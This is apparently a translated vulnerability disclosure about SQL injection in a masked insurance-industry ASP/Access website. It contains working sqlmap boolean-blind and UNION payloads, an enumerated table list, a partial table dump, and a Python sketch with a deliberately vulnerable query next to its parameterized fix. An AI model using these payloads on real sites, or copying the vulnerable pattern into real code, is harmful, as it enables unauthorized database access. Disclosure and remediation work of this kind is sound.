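2015-10-16: Details reported to the vendor; awaiting vendor handling
2015-10-20: Vendor confirmed; details disclosed to the vendor only
2015-10-30: Details disclosed to core white hats and experts in related fields
2015-11-09: Details disclosed to regular white hats
2015-11-19: Details disclosed to trainee white hats
2015-12-04: Details disclosed to the public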
As the title says.....
Injection points:
http://**.**.**.**/CHN/Home/HomeList_Search.asp?SearchString=1
http://**.**.**.**/CHN/Home/HomeShow.asp?ContentId=1
Parameter: SearchString (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: SearchString=1%' AND 7347=7347 AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: SearchString=-4685%' UNION ALL SELECT CHR(113)&CHR(112)&CHR(113)&CHR(112)&CHR(113)&CHR(80)&CHR(86)&CHR(72)&CHR(87)&CHR(85)&CHR(115)&CHR(65)&CHR(72)&CHR(71)&CHR(117)&CHR(113)&CHR(106)&CHR(118)&CHR(122)&CHR(113),NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[7 tables]
+---------+
| area    |
| branch  |
| company |
| exam    |
| job     |
| member  |
| news    |
+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: SearchString (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: SearchString=1%' AND 7347=7347 AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: SearchString=-4685%' UNION ALL SELECT CHR(113)&CHR(112)&CHR(113)&CHR(112)&CHR(113)&CHR(80)&CHR(86)&CHR(72)&CHR(87)&CHR(85)&CHR(115)&CHR(65)&CHR(72)&CHR(71)&CHR(117)&CHR(113)&CHR(106)&CHR(118)&CHR(122)&CHR(113),NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft Access
banner: None
current user: None
current database: None
hostname: None
current user is DBA: None
Database: Microsoft_Access_masterdb
Table: branch
[8 entries]
+----+--------+-----+------+-------+---------+-----------------------------------------------------------------------+----------+
| id | areaid | url | data | email | manager | address | priority |
+----+--------+-----+------+-------+---------+-----------------------------------------------------------------------+----------+
| <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | S\x17N\\?ac^\x02?W\\?ceS:?b\x10?Y\x16Y'?u29S\\?f7V\\?fd[\\?beQ\\?99[W | <blank> |
| <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | S\x17N\\?ac^\x02?W\\?ceS:?b\x10?Y\x16Y'?u29S\\?f7V\\?fd[\\?beQ\\?99[W | <blank> |
| <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | S\x17N\\?ac^\x02?W\\?ceS:?b\x10?Y\x16Y'?u29S\\?f7V\\?fd[\\?beQ\\?99[W | <blank> |
| <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | SN\?ac^?W\?ceS:?b?YY'?u29S\?f7V\?fd[\?beQ\?99[W | <blank> |
| <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | SN\?ac^?W\?ceS:?b?YY'?u29S\?f7V\?fd[\?beQ\?99[W | <blank> |
| <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | SN\?ac^?W\?ceS:?b?YY'?u29S\?f7V\?fd[\?beQ\?99[W | <blank> |
| <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | SN\?ac^?W\?ceS:?b?YY'?u29S\?f7V\?fd[\?beQ\?99[W | <blank> |
| <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | SN\?ac^?W\?ceS:?b?YY'?u29S\?f7V\?fd[\?beQ\?99[W |
+----+--------+-----+------+-------+---------+-----------------------------------------------------------------------+----------+
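Filter keywords......
Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-10-20 16:34
CNVD has confirmed and reproduced the issue as described and has passed it, via CNCERT, to the authority responsible for IT in the insurance industry, which will coordinate follow-up handling with the organization that operates the website.
None yet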
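
Added example, not part of the original report or the affected site's code: the sqlmap payloads above imply that SearchString is concatenated into a LIKE '%...%' clause. The sketch below uses Python's sqlite3 as a stand-in for the ASP/Access back end (table, column and function names are assumptions) to put the concatenated query beside a bound-parameter version and check both with the boolean probe from the report.

```python
import sqlite3

# Probe taken from the report's sqlmap output, plus a constructed always-false twin.
TRUE_PROBE = "1%' AND 7347=7347 AND '%'='"
FALSE_PROBE = "1%' AND 7347=7348 AND '%'='"

def make_db():
    """Constructed sample data; sqlite3 stands in for the Access back end."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?)",
                   [(1, "Notice 1", "a"), (2, "Notice 2", "b"), (3, "100% cover", "c")])
    return db

def search_vulnerable(db, search_string):
    # Assumed shape of the flawed query: input concatenated inside LIKE '%...%'.
    sql = ("SELECT id, title, body FROM news "
           "WHERE title LIKE '%" + search_string + "%'")
    return db.execute(sql).fetchall()

def escape_like(text, esc="\\"):
    # Make LIKE wildcards in user input match only themselves.
    for ch in (esc, "%", "_"):
        text = text.replace(ch, esc + ch)
    return text

def search_safe(db, search_string):
    # Bound parameter: the input is data and never becomes SQL text.
    sql = "SELECT id, title, body FROM news WHERE title LIKE ? ESCAPE '\\'"
    return db.execute(sql, ("%" + escape_like(search_string) + "%",)).fetchall()

def boolean_oracle(search, db):
    # True when the true/false probes change the result set, i.e. the
    # condition in the input was evaluated as SQL (the blind-injection signal).
    return search(db, TRUE_PROBE) != search(db, FALSE_PROBE)

if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", boolean_oracle(search_vulnerable, db))
    print("parameterized query injectable:", boolean_oracle(search_safe, db))
    print("literal '%' search:", search_safe(db, "%"))
```

On the ASP/Access stack the corresponding change is a parameterized ADODB.Command in place of string concatenation; the boolean_oracle check can be kept as a regression test for the search endpoint.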